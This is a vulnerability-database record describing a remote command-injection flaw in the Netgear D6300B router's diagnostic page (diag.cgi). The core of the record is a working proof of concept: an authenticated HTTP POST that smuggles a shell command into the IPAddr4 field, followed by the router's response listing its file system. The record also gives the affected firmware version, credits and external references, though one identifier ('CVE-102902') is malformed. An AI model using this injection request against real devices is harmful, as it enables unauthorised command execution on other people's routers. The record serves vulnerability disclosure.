ID
VAR-E-201402-0144
EDB ID
39089
TITLE
Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution. CVE-102902 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | d6300b | scope: | - | version: | - | Trust: 1.0 |
EXPLOIT
source: https://www.securityfocus.com/bid/65444/info
The Netgear D6300B router is prone to the following security vulnerabilities:
1. Multiple unauthorized-access vulnerabilities
2. A command-injection vulnerability
3. An information disclosure vulnerability
An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible.
Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected.
######## REQUEST: #########
###########################
POST /diag.cgi?id=991220771 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/DIAG_diag.htm
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1
######## RESPONSE: ########
###########################
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"
Cache-Control:no-cache
Pragma:no-cache
<!DOCTYPE HTML>
<html>
[...]
<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
bin
cferam.001
data
dev
etc
include
lib
linuxrc
mnt
opt
</textarea>
[...]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'/diag.cgi?IPAddr4' Remote Command Execution
Trust: 1.0
CREDITS
Marcel Mangold
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 39089 | Trust: 1.9 |
| db: | BID | id: | 65444 | Trust: 1.9 |
| db: | EDBNET | id: | 60088 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/65444/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/39089/ | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/39089 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 65444 |
| db: | EXPLOIT-DB | id: | 39089 |
| db: | EDBNET | id: | 60088 |
LAST UPDATE DATE
2022-07-27T09:27:28.627000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 65444 | date: | 2014-07-14T00:17:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 65444 | date: | 2014-02-05T00:00:00 |
| db: | EXPLOIT-DB | id: | 39089 | date: | 2014-02-05T00:00:00 |
| db: | EDBNET | id: | 60088 | date: | 2014-02-05T00:00:00 |